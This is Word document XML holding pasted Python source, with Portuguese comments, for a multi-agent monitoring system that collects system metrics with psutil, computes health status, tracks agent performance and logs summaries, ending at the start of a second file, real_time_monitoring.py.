    <w:p w14:paraId="636E10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088E6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Memória</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1CB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memory = psutil.virtual_memory()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D12C7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self.system_metrics["memory_percent"] = memory.percent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648640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self.system_metrics["memory_available_mb"] = memory.available / (1024 * 1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F1F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B23E6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Disco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5611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disk = psutil.disk_usage('/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF30F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self.system_metrics["disk_percent"] = disk.percent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA554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self.system_metrics["disk_free_gb"] = disk.free / (1024 * 1024 * 1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B8A6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DD472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Rede</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43AF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net_io = psutil.net_io_counters()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B598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self.system_metrics["network_io"] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB92D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"bytes_sent": net_io.bytes_sent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B64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"bytes_recv": net_io.bytes_recv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2001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FEA42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90A80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Processos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB93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self.system_metrics["process_count"] = len(psutil.pids())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A93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5D688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Uptime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424250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self.system_metrics["uptime_seconds"] = (datetime.now() - self.start_time).total_seconds()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050ED5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51296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5516F6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coletando m</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tricas do sistema: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0571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4D4B3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self.system_metrics.copy()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0960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5D370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get_health_status(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B879C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status de saúde do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8132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metrics = self.collect_system_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538081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3FC1B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Determinar status geral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A67A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health_issues = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9ED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1E801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metrics["cpu_percent"] &gt; 90:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C82AB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health_issues.append("High CPU usage")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AFF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metrics["memory_percent"] &gt; 90:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFFD3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health_issues.append("High memory usage")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55A0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metrics["disk_percent"] &gt; 95:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FBDE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health_issues.append("Low disk space")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1184E9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2FFEE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not health_issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E09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overall_status = "healthy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413433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elif len(health_issues) == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB83C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overall_status = "warning"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F89F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550A0C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overall_status = "critical"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA13C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DA168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2432E4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"overall_status": overall_status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71C8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"health_issues": health_issues,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2A36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"system_metrics": metrics,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D883B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"last_check": datetime.now().isoformat()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64DD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E96C48D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FF1A14" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D986E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EnhancedMonitoringSystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB7F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"""Sistema de monitoramento avançado completo"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA5EE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2EAD9B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553119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self.performance_analyzer = PerformanceAnalyzer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579975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self.alert_manager = AlertManager()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353FD7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self.health_monitor = SystemHealthMonitor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3186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self.agent_metrics: Dict[str, AgentMetrics] = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF22A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self.monitoring_active = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28506E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self.monitoring_thread = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B89F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5CE74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start_monitoring(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6142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"""Inicia monitoramento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3508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self.monitoring_active = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA240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self.monitoring_thread = threading.Thread(target=self._monitoring_loop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E87F7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self.monitoring_thread.daemon = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0129D7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self.monitoring_thread.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4870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Sistema de monitoramento avançado iniciado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06F1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85D9F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stop_monitoring(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB395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"""Para monitoramento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066CA0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self.monitoring_active = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105816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self.monitoring_thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DEE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self.monitoring_thread.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14988D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Sistema de monitoramento parado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7286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390D6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_monitoring_loop(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56824B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"""Loop principal de monitoramento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F63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while self.monitoring_active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A8C7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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FCBC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# Coletar métricas do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCDB9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system_health = self.health_monitor.get_health_status()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E53B8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3CD8F5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# Verificar alertas de sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DEF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system_health["overall_status"] != "healthy":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CAA8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for issue in system_health["health_issues"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A74A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alert = self.alert_manager._create_alert(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF15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"system_health",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AC3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"system",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2FD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f"System health issue: {issue}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF1D9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system_health["system_metrics"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482485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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2B4B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63FFFF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# Analisar performance dos agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF21B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agent_id, metrics in self.agent_metrics.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A08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analysis = self.performance_analyzer.analyze_agent_performance(metrics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E3F8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74C4D4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# Verificar alertas do agente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B36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alerts = self.alert_manager.check_agent_alerts(metrics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35127A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20EC3E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# Log resumo a cada 60 segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223837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int(time.time()) % 60 == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC35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self._log_monitoring_summary()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D20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6BB7A6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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8058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no loop de monitoramento: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D634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99866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time.sleep(5)  # Verificar a cada 5 segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1DB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03627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update_agent_metrics(self, agent_id: str, metrics_data: Dict[str, Any]):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D25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"""Atualiza métricas de um agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC164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393D32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metrics = AgentMetrics(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC168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agent_id=agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CF43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agent_type=metrics_data.get("agent_type", "unknown"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D6C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status=metrics_data.get("status", "unknown"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244DE4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uptime_seconds=metrics_data.get("uptime_seconds", 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5678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messages_processed=metrics_data.get("messages_processed", 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6267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messages_per_second=metrics_data.get("messages_per_second", 0.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B33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response_time_avg_ms=metrics_data.get("response_time_avg_ms", 0.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03427E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error_count=metrics_data.get("error_count", 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F827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error_rate=metrics_data.get("error_rate", 0.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53173E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cpu_usage_percent=metrics_data.get("cpu_usage_percent", 0.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC531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memory_usage_mb=metrics_data.get("memory_usage_mb", 0.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7B2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last_activity=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F90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capabilities_count=metrics_data.get("capabilities_count", 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCFEE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active_tasks=metrics_data.get("active_tasks", 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B1E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5E973D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B0D1E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self.agent_metrics[agent_id] = metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71589A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F1E88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017061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atualizando m</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tricas do agente {agent_id}: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5B1C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5553F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_log_monitoring_summary(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62758D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"""Log resumo do monitoramento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C514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system_health = self.health_monitor.get_health_status()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD97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alert_summary = self.alert_manager.get_alert_summary()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6A25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C2AA0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logger.info("=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A53FA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RESUMO DE MONITORAMENTO")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C261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logger.info("=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56113D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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🖥️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema: {system_health['overall_status'].upper()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6CAB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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Agentes Monitorados: {len(self.agent_metrics)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F836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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚨</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Alertas Ativos: {alert_summary['total_active']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E32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2D28C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alert_summary['by_severity']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E5F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   Por Severidade: {alert_summary['by_severity']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4992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482B6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Top 3 agentes por performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AA30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self.agent_metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22F4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performances = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A79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agent_id, metrics in self.agent_metrics.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D70F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analysis = self.performance_analyzer.analyze_agent_performance(metrics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E94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performances.append((agent_id, analysis["overall_score"]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252196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4A369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performances.sort(key=lambda x: x[1], reverse=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AE4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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Top 3 Agentes por Performance:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBAE3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i, (agent_id, score) in enumerate(performances[:3], 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ACCF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logger.info(f"   {i}. {agent_id}: {score:.1f}%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9077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33A9A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logger.info("=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4418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21660D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get_comprehensive_report(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631682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"""Gera relatório abrangente do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719B27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system_health = self.health_monitor.get_health_status()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683BB0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alert_summary = self.alert_manager.get_alert_summary()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB80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9B6AF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Análise de performance de todos os agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206ED7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agent_analyses = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749CB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agent_id, metrics in self.agent_metrics.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A31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agent_analyses[agent_id] = self.performance_analyzer.analyze_agent_performance(metrics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331DC3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7EF53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Calcular métricas agregadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351A6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self.agent_metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6BD2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avg_response_time = statistics.mean([m.response_time_avg_ms for m in self.agent_metrics.values()])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096677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avg_error_rate = statistics.mean([m.error_rate for m in self.agent_metrics.values()])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B011C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total_messages = sum([m.messages_processed for m in self.agent_metrics.values()])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B968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47ED42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avg_response_time = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742072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avg_error_rate = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD086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total_messages = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BEC4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675BC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3DD387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"report_timestamp": datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700EB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"system_health": system_health,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7966A0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"alert_summary": alert_summary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D00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"agent_count": len(self.agent_metrics),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A424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"agent_analyses": agent_analyses,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342233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"aggregate_metrics": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F22D6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"avg_response_time_ms": avg_response_time,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168897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"avg_error_rate": avg_error_rate,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FD7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"total_messages_processed": total_messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736641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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCCE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"active_alerts": [asdict(alert) for alert in self.alert_manager.get_active_alerts()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61935D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D715734" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302B5C5B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A82C9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__name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567087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# Teste do sistema de monitoramento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3616A9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monitoring = EnhancedMonitoringSystem()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7542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monitoring.start_monitoring()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1385F6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15582F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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FE5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Simular métricas de agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B534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i in range(3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B47E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monitoring.update_agent_metrics(f"test_agent_{i}", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52674C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"agent_type": "test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF3E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"status": "running",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126843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"uptime_seconds": 300,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E374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"messages_processed": 100 + i * 50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F51D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"messages_per_second": 2.5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8377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"response_time_avg_ms": 200 + i * 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109A31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"error_count": i,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067186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"error_rate": i * 0.01,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B75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"cpu_usage_percent": 30 + i * 20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D747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"memory_usage_mb": 128 + i * 64,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED9EF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"capabilities_count": 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D1D2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"active_tasks": i + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181C3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3369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1689D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time.sleep(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3560FD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4EA74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Gerar relatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1182C5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report = monitoring.get_comprehensive_report()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F121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print(json.dumps(report, indent=2, default=str))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC2D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14C97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except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225BA4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print("Interrompido pelo usuário")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CED8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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C99CC7A" w14:textId="46574D45" w:rsid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monitoring.stop_monitoring()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA346F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E959530" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501C9544" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="3A461C84" w14:textId="73972F96" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r w:rsidRPr="006D02FF">
        <w:t>real_time_monitoring.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65801F94" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F486234" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUNA-ALSHAM Real-Time Monitoring System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC653F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>Sistema de monitoramento em tempo real com dados reais dos agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4DB36" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="1D8A585F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>FUNCIONALIDADES AVANÇADAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6CFF5D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Coleta de métricas reais dos agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D7E3B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WebSocket para atualizações em tempo real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16308968" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Analytics avançado com histórico completo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F142AE1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exportação de dados e relatórios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BDDA3F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Alertas inteligentes baseados em IA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A7AED" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Validação científica das métricas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAC059" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1DF89" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="18D9765F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EC7B1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
